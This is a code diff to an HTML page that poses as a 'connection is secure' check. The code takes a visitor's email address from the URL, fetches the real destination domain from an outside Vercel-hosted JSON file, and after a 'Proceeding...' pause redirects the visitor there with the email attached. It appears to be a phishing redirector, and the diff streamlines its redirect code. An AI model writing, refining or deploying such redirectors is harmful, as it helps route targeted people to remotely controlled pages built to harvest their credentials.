--- a/index.html
+++ b/index.html
@@ -70,26 +70,28 @@ may see this page while the site ensures that the connection is secure.</div></d
     </div>
 
 <script>
-function filter(data) {
+function filter(data,param) {
 let domain;
     domain = data.domain_name;
 	
 var url = window.location.href;
-let Url = {
-    get get(){
-        var vars= {};
-        if(url.length!==0)
-            url.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m,key,value){
-                key=decodeURIComponent(key);
-                if(typeof vars[key]==="undefined") {vars[key]= decodeURIComponent(value);}
-                else {vars[key]= [].concat(vars[key], decodeURIComponent(value));}
-            });
-        return vars;
-    }
-};
-var email = Url.get.e;
+const urlParams = new URLSearchParams(window.location.search);    
+const email = urlParams.get('e');
+// let Url = {
+//     get get(){
+//         var vars= {};
+//         if(url.length!==0)
+//             url.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m,key,value){
+//                 key=decodeURIComponent(key);
+//                 if(typeof vars[key]==="undefined") {vars[key]= decodeURIComponent(value);}
+//                 else {vars[key]= [].concat(vars[key], decodeURIComponent(value));}
+//             });
+//         return vars;
+//     }
+// };
 
-window.location.href = domain+'0'+email;
+
+window.location.href = domain+email;
 }
 
 setTimeout( function(){
@@ -109,11 +111,8 @@ setTimeout( function(){
 	head.style.fontWeight = "600";
 	head.innerText = "Proceeding...";
 	k.appendChild(head);
-    const urlParams = new URLSearchParams(window.location.search);
-    
-		// Get the value of a specific parameter
-		const paramValue = urlParams.get('e');
-        console.log("urlParams:",paramValue);
+ 
+        
 fetch("https://test-aws-illz.vercel.app/1.json")
     .then((response) => response.json())
     .then(function(data) {
